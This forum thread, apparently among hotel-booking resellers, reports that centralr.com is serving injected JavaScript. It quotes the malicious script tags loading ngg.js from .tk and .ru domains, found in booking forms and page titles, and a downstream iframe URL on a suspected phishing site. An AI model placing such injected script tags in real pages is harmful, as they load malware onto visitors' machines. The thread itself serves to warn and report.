CentralR.com hacked?

[webdream]

seems like centralr.com are serving up some unexpected JS files on their online hotel booking forms today - usualy included as IFRAMES on the hotel websites:

<script src=http://www.gbradde.tk/ngg.js></script><script src=http://www.brcporb.ru/ngg.js></script>

Their own website also seems to have some strange page tiltles:

http://centralr.com/select_a_room.asp


<title>centralr.com - Hotel Reservations<script src=http://www.gbradde.tk/ngg.js></script><script src=http://www.brcporb.ru/ngg.js></script></title>

Anyone without good AV might be getting a malicious tool downloaded - at least thats what norton says.

 

[webdream]

looks like this js file, http://www.brcporb.ru/ngg.js writes iframes calling a script from here

http://cdrpoex.com/cgi-bin/index.cgi?ad

The site at cdrpoex.com says it offers money transfer services, but looks a bit phishy to me. Don't think i'll be transfering any funds through them

http://whois.domaintools.com/cdrpoex.com

 

[Gavin]

Ah fiddle sticks, that's all I need.

Is it just me or is the site totally down?

 

[webdream]

looks like they took the entire site offline.

just reading through the reseller agreement from bookassist.... hmmm

 

[Gavin]

I started with bookasist bit didn't really take it anywhere. Any other programs out there that you know about?

 

[webdream]

they used to pay a better finders fee is all i know.

whatever a hotel is using is fine with me - just get the job done and get paid is my motto.

mind you, if a hotel can be swayed to change booking engine, go for the one paying the biggest reseller commision.